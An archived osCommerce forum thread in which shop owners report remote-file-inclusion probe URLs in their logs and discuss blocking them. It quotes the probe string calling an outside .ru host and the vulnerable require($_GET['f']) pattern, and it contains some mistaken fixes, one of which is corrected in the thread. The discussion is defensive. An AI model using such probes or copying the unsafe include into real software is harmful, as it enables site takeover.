Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Have i been hacked


rommany

Recommended Posts

Hello

 

I'm getting a strange URL coming up on my who's online, i see this popping up many times a day and have no idea why and how it got there, ive removed the first part and the end bit joioiskioeriyyskwkdwjsdfewis.land.ru does change to a few other addresses but the URL should just be www.xxxxxxxx.co.uk/baby_names.php

 

/baby_names.php?f=http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

 

So doe this look like i have been hacked and what good would that do to them as the address doe not exist

Link to comment
Share on other sites

find out that person's ip address and ban it from accessing your site.

Ken

commercial support - unProtected channel, not to be confused with the forum with same name - open to everyone who need some professional help: either PM/email me, or go to my website (URL can be found in my profile).

over 20 years of computer programming experience.

Link to comment
Share on other sites

Thanks Ken

 

That's a great idea, i can get that from the who's online in admin, but i will watch it for a day or so and see how many IP address are coming from it, i also will try to see where that IP is reg.

 

Thanks again

Link to comment
Share on other sites

I'm getting the same thing in my store. IP Addresses (according to Whos Online) are from Norway, South Carolina and Quebec so far. Can this be right?

I just read an article that SQL injection attacks are going on. Don't know if this applies to us but it got me concerned. SQL Injection Attack

Link to comment
Share on other sites

I believe they are trying to do a remote file include exploit and would only hurt you if you had something similar to the following:

 

require($_GET['f']);

 

I believe stock OSCommerce does not do this.

 

The best thing to do is block any request that has "http://" in the query string.

Link to comment
Share on other sites

I believe they are trying to do a remote file include exploit and would only hurt you if you had something similar to the following:

 

require($_GET['f']);

 

I believe stock OSCommerce does not do this.

 

The best thing to do is block any request that has "http://" in the query string.

Thanks a lot WedgeCoop. I've been busy banning. But I don't understand why the IP Addresses are so spread out among the world. They are now coming from Kentucky and New York state now.

All I know to do is to ban. Thanks again!

Link to comment
Share on other sites

I believe they are trying to do a remote file include exploit and would only hurt you if you had something similar to the following:

 

require($_GET['f']);

 

I believe stock OSCommerce does not do this.

 

The best thing to do is block any request that has "http://" in the query string.

Bit of a stupid question.

 

A lot of contributions (downloaded from here) have unprotected gets like this in the admin panel.

 

Easy fix would be:

mysql_real_escape_string($_GET['f']);

 

but is this really necessary if the admin panel is htacces, ip & login protected and only trusted personnel have access to it?

Link to comment
Share on other sites

  • 2 weeks later...
Hello

 

I'm getting a strange URL coming up on my who's online, i see this popping up many times a day and have no idea why and how it got there, ive removed the first part and the end bit joioiskioeriyyskwkdwjsdfewis.land.ru does change to a few other addresses but the URL should just be www.xxxxxxxx.co.uk/baby_names.php

 

/baby_names.php?f=http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

 

So doe this look like i have been hacked and what good would that do to them as the address doe not exist

 

 

I've been getting the same treatment. I just found this link very helpful:

http://www.webproworld.com/internet-securi...-attackers.html

 

If anyone has any comments or suggestions about this solution, we would love to read them :)

 

I am running what is probably an older version of osCommerce. Does anyone know if the newer version now has code in place to prevent these kinds of attacks?

Link to comment
Share on other sites

  • 4 months later...
I believe they are trying to do a remote file include exploit and would only hurt you if you had something similar to the following:

 

require($_GET['f']);

 

I believe stock OSCommerce does not do this.

 

The best thing to do is block any request that has "http://" in the query string.

 

Is this the correct code to block the http request?

 

RewriteCond %{QUERY_STRING} http://*\(.*\) [OR]

RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]

Link to comment
Share on other sites

Bit of a stupid question.

 

A lot of contributions (downloaded from here) have unprotected gets like this in the admin panel.

 

Easy fix would be:

mysql_real_escape_string($_GET['f']);

 

but is this really necessary if the admin panel is htacces, ip & login protected and only trusted personnel have access to it?

 

Dangerous advice this imo.

 

mysql_real_escape_string has nothing to do with the querystring it is for escaping entries into a MySQL database.

 

e.g. try this

 

<?php

$url = 'http://www.imahacker.com/index.php?dosomethingnasty=this';

print(mysql_real_escape_string($url));

?>

 

It prints http://www.imahacker.com/index.php?dosomethingnasty=this

 

Security Pro is available as a contribution for those who wish to safeguard their querystring.

Link to comment
Share on other sites

So are ppl proteched with 2.2 RC1? I'v installed few mods

 

If you consider that osCommerce has had to run securely over the years with register globals set to on (which is pretty much unthinkable these days in terms of security) I think it really gives a good indication of the care taken over, and the quality of the coding.

 

You really shouldn't worry about a stock oscommerce RC1/2 (although you should always upgrade when the upgrades are available especially if there are security updates), the problems are the contributions where there is no code control.

Link to comment
Share on other sites

Dangerous advice this imo.

 

mysql_real_escape_string has nothing to do with the querystring it is for escaping entries into a MySQL database.

 

e.g. try this

 

<?php

$url = 'http://www.imahacker.com/index.php?dosomethingnasty=this';

print(mysql_real_escape_string($url));

?>

 

It prints http://www.imahacker.com/index.php?dosomethingnasty=this

 

Security Pro is available as a contribution for those who wish to safeguard their querystring.

fudge. you're right.

so what other sanitization method should be implimented (aside from security pro), which is already installed... double sanitation does not hurt.

 

htmlspecialchars()?

but isn't there ways around this one.

Link to comment
Share on other sites

fudge. you're right.

so what other sanitization method should be implimented (aside from security pro), which is already installed... double sanitation does not hurt.

 

htmlspecialchars()?

but isn't there ways around this one.

 

All user input should be checked against the purpose for which it is intended and what is expected.

 

e.g. if you are expecting a digit you could just force it to be so by using the standard osc function ..

 

tep_string_to_int($string);

 

Or just using (int)$var will force the $var into an integer.

 

Some standard php functions are useful such as ..

 

ctype_alpha()

ctype_digit()

ctype_alnum()

Link to comment
Share on other sites

thanks!!!! i've never came across any of these before.

bit of a question about them.. doesn't seem to be much chatter about it on php.net..

 

my test string (just trying to output the 1st letter of the query string):

$letter = ctype_alpha(substr($_GET['letter'],0,1));

...results in a "1".

 

can this only be used in this fashion:

$letter = $_GET['letter'];
if (ctype_alnum($letter)){
//results in my desired output
}else{
require('404.php');
}

if so, what is quicker? preg_replace or if?

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...